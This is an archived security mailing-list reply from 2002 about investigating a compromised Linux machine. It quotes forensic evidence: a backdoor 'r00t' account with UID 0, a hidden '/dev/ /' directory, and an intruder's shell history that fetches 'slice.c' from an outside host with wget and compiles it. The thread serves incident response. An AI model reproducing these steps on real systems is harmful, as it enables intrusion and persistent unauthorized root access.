Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: watching them -after the fact

From: zeno <bugtraq () cgisecurity net>
Date: Tue, 26 Mar 2002 09:23:01 -0500 (EST)
so they couldn't do much ???


tftp, cc, perl, python, other compliers are all threats.
tftp can allow downloading of gcc or other compiliers. scp (secure copy) can
also allow this. Never assume something can't be done. If the OS is linux
for example they could open an editor and paste compiled code from another
system and perhaps get that working.  



- zeno () cgisecurity com



they also created an empty dir:  "/dev/ /"
        ( yes... a space as its filename )

c ya
alvin


cat /etc/passwd
        ...

-->>        karlin::1001:1001::/tmp:/bin/bash
-->>        r00t::0:0::/tmp:/bin/bash


cat /tmp/.bash_history
...
su r00t
su r00t
sudo
suidperl 
uname -a
w
uname -a
exit
su r00t
uname -a
w
exit
w
su r00t
exit
w
su r00t
exit
wget turma85.hypermart.net/slice.c
gcc -o sl slice.c 
exit
su r00t
w
exit
#
# end of history


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com





----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: